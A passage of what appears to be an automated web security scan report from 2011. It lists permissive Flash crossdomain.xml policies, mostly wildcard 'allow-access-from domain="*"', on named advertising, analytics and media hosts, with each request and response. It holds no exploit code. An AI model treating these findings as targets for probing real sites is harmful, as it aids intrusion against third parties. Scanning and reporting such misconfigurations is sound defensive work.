HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:35 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.31. http://metrics.mcafee.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:52 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.32. http://metrics.sonystyle.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sonystyle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sonystyle.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:59 GMT
Server: Omniture DC/2.0.0
xserver: www201
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.33. http://metrics.us.playstation.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.us.playstation.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.us.playstation.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.34. http://nexus2.ensighten.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nexus2.ensighten.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nexus2.ensighten.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:09 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT
ETag: "4b9cf-145-49793ce00fac0"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://p.brilig.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Mon, 16 May 2011 01:23:25 GMT
ETag: "3a149-ab-4a3053698f340"
Last-Modified: Wed, 11 May 2011 19:38:13 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
X-Brilig-D: D=84
Content-Length: 171
Connection: Close

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

6.36. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.37. http://pixel.33across.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 16 May 2011 01:29:35 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.38. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.39. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 20:26:59 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 20:26:59 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.40. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:30:58 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 22 May 2011 21:30:58 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.41. http://serv.adspeed.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: serv.adspeed.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Thu, 27 May 2010 16:12:36 GMT
Content-Length: 357
Connection: close
Date: Mon, 16 May 2011 01:20:34 GMT
Server: AdSpeed/s12

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.42. http://sony.links.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.links.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 14:45:11 GMT
ETag: "80753121df22c81:320b"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 20:26:33 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.links.origin.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2dd2"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Sun, 15 May 2011 20:26:47 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.44. http://sony.tcliveus.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.tcliveus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tcliveus.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 79
Last-Modified: Sun, 15 May 2011 21:20:49 GMT
Content-Type: application/xml; charset=ISO-8859-1
Date: Sun, 15 May 2011 21:20:49 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Mon, 16-May-11 01:20:49 GMT;path=/

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.45. http://sony.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 21:19:59 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sonycomputerentertai.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 20:26:46 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.47. http://sync.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x220a 8714
Set-Cookie: ts=1305509186; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:26 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.48. http://t.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:26:58 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.49. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:26:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "c80001-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.50. http://ttwbs.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ttwbs.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 20:26:57 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 441

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.51. http://turn.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:26:47 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:26:46 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.52. http://usatoday1.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:53 GMT
Server: Omniture DC/2.0.0
xserver: www147
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.53. http://w88.go.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://w88.go.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:17 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.54. http://webtrends.telegraph.co.uk/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://webtrends.telegraph.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: webtrends.telegraph.co.uk

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8fb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://www.viddler.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.viddler.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: application/xml
Connection: close
X-Viddler-Node: viddler_d
Accept-Ranges: bytes
ETag: W/"80-1303891997000"
Last-Modified: Wed, 27 Apr 2011 08:13:17 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.56. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:31:36 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.57. http://api.tweetmeme.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 01:25:09 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Mon, 16 May 2011 01:25:25 +0000 GMT
Etag: 686d9b984ed45b19cd2ab4ba31d09141
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

6.58. http://content.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
Accept-Ranges: bytes
ETag: "2bdf8b1217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.59. http://contextweb.usatoday.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://contextweb.usatoday.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:45 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.60. http://cookex.amp.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cookex.amp.yahoo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:24:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

6.61. http://dcl.wdpromedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:27:01 GMT
Cache-Control: max-age=300
Date: Mon, 16 May 2011 01:24:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
